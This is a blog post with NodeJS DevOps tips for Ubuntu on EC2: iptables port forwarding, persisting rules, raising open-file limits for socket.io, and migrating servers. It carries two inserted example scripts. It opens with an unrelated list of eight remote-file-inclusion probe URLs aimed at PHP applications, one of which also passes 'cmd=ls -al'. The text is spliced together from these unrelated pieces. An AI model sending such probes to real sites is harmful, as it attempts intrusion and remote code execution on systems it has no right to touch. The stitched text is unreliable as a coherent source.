/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=http://www.google.com/humans.txt?
/template.php?pagina=http://www.google.com/humans.txt?
/sw/lib_up_file/find_file.php?doc_directory=http://www.google.com/humans.txt?
/system/admin/include/item_main.php?GLOBALS=http://www.google.com/humans.txt?
/stphpbtnimage.php?STPHPLIB_DIR=http://www.google.com/humans.txt?
/toolbar.loudmouth.php?mainframe=http://www.google.com/humans.txt?
/ytb/cuenta/cuerpo.php?base_archivo=http://www.google.com/humans.txt?
/xarg_corner_bottom.php?xarg=http://www.google.com/humans.txt?

NodeJS setup tips for DevOps

These are steps I took to help secure a NodeJS web application and keep socket.io running reliably on Ubuntu 12.04 on an Amazon EC2 server.

Stop running NodeJS as root and use port forwarding

If NodeJS runs as root and someone manages to hack some aspect of your application, they could do a lot of damage to your server.

The downside of running a NodeJS process as a non-root user is that it can’t listen on port 80 or 443, which poses a problem for many web applications. The solution is port forwarding. Here’s an excellent write-up on port forwarding with iptables.

But the next time the server is rebooted, your iptables rules will be gone; they aren’t permanent. To save the configuration, check out Solution #1 in the iptables howto and this stackoverflow Q&A. They both describe the same method, but one page makes it look more complicated than the other.

Reboot the server and view your iptables to check the settings are still applied.
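The forwarding and persistence steps above as one idempotent script. This is an added example, not taken from the linked write-ups; the app ports 8080/8443, the rules file `/etc/iptables.rules` and the `pre-up` restore line in the final comment are assumptions.

```shell
#!/bin/sh
# Added example: redirect ports 80/443 to an unprivileged Node listener
# and save the rules so they can be restored at boot.
# Assumed values: app ports 8080/8443, rules file /etc/iptables.rules.
HTTP_APP_PORT="${HTTP_APP_PORT:-8080}"
HTTPS_APP_PORT="${HTTPS_APP_PORT:-8443}"
RULES_FILE="${RULES_FILE:-/etc/iptables.rules}"
IPTABLES="${IPTABLES:-iptables}"                 # overridable for a dry run
IPTABLES_SAVE="${IPTABLES_SAVE:-iptables-save}"

# Rule spec (everything after the chain name) for one redirect.
redirect_spec() {
    echo "-p tcp --dport $1 -j REDIRECT --to-ports $2"
}

# Add the PREROUTING redirect only if an identical rule is not loaded yet,
# so running the script twice does not stack duplicate rules.
ensure_redirect() {
    spec=$(redirect_spec "$1" "$2")
    # $spec is left unquoted on purpose: it must split into arguments.
    if ! $IPTABLES -t nat -C PREROUTING $spec 2>/dev/null; then
        $IPTABLES -t nat -A PREROUTING $spec
    fi
}

# Dump the running rule set to a file only its owner can read.
persist_rules() {
    ( umask 077; $IPTABLES_SAVE > "$RULES_FILE" )
}

# Succeed only if the saved file contains both redirects (check before reboot).
verify_saved() {
    grep -q -- "--dport 80 .*REDIRECT --to-ports $HTTP_APP_PORT" "$RULES_FILE" &&
    grep -q -- "--dport 443 .*REDIRECT --to-ports $HTTPS_APP_PORT" "$RULES_FILE"
}

# Run as: sudo sh forward.sh apply
if [ "${1:-}" = "apply" ]; then
    ensure_redirect 80 "$HTTP_APP_PORT"
    ensure_redirect 443 "$HTTPS_APP_PORT"
    persist_rules && verify_saved && echo "rules saved to $RULES_FILE"
    # Assumed restore hook, added under the interface stanza in
    # /etc/network/interfaces:
    #   pre-up iptables-restore < /etc/iptables.rules
fi
```

PREROUTING rules only apply to traffic arriving from the network, so a request made on the server itself to localhost:80 is not redirected. The app ports stay directly reachable unless the EC2 security group exposes only 80 and 443.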

Open File Limits

Linux puts limits on the number of files a user can have open at once. You can see the limit with the command ulimit -n. Linux also counts open network connections as open files. Using socket.io for realtime web applications causes at least one connection to open (and stay open) as users come to your site, leave it open in a browser tab, and then go somewhere else. On a default Ubuntu setup, ~1000 idling users with socket.io connections open may be enough to bring your NodeJS app down with this error:

Error: EMFILE, Too many open files

You can temporarily set the open file limit higher for the currently logged-in Linux user with the command ulimit -n 5000; however, this change will be wiped out as soon as the Linux shell user logs out. There’s a good blog post on updating ulimit numbers on posidev.com which outlines the steps to make the change permanent, even after a reboot.
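`ulimit -n` reports the limit of the shell you type it in, not of the NodeJS process that is already running. The following added example (not from the original post or the linked blog) reads the limit the kernel enforces for a given PID from `/proc` and compares it with the descriptors that process currently holds; `PROC_ROOT` and the 80% default threshold are assumptions.

```shell
#!/bin/sh
# Added example: how close is a running process to "EMFILE, Too many open files"?
# PROC_ROOT is overridable only so the functions can be exercised against a
# constructed directory tree instead of the live /proc.
PROC_ROOT="${PROC_ROOT:-/proc}"

# Soft "Max open files" limit of PID $1, as enforced for that process.
soft_nofile() {
    awk '/^Max open files/ { print $4 }' "$PROC_ROOT/$1/limits" 2>/dev/null
}

# Number of descriptors PID $1 holds right now (sockets are counted too).
open_fds() {
    ls -1 "$PROC_ROOT/$1/fd" 2>/dev/null | wc -l | tr -d ' '
}

# Print "used limit percent". Returns 0 while usage is below the threshold
# ($2, default 80), 1 once it is reached, 2 if the limit cannot be read.
fd_headroom() {
    pid=$1
    threshold=${2:-80}
    limit=$(soft_nofile "$pid") || return 2
    case "$limit" in ''|*[!0-9]*) return 2 ;; esac
    [ "$limit" -gt 0 ] || return 2
    used=$(open_fds "$pid")
    pct=$(( used * 100 / limit ))
    echo "$used $limit $pct"
    [ "$pct" -lt "$threshold" ]
}

# Run as: sh fdcheck.sh <pid-of-node> [threshold-percent]
if [ -n "${1:-}" ]; then
    out=$(fd_headroom "$1" "${2:-80}"); rc=$?
    case $rc in
        0) echo "ok: $out (used limit percent)" ;;
        1) echo "WARNING, close to EMFILE: $out (used limit percent)" ;;
        *) echo "cannot read limits for pid $1" ;;
    esac
fi
```

Run it as root or as the user that owns the NodeJS process, otherwise `/proc/<pid>/fd` is not readable. A raised limit only shows up here after the process has been restarted under the new setting.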

I’ve gone live already! Is it too late?

If you can swap your active web application server(s) from one machine to another without losing data, it isn’t too late.

In my case, I had a NodeJS app running on an AWS EC2 server, and a database hosted somewhere else by MongoLab. I was able to:

  1. Make a copy of the EC2 server by making an AMI, and launching a new server from it
  2. Make the iptables and ulimit changes on the new server and reboot it to test that the changes stuck
  3. Check the website was still accessible on the new server by accessing it via its Public DNS (a URL like http://ec2-107-20-193-72.compute-1.amazonaws.com)
  4. Point the domain to the new server by re-associating the Elastic IP with the new server
  5. Shut down the old server.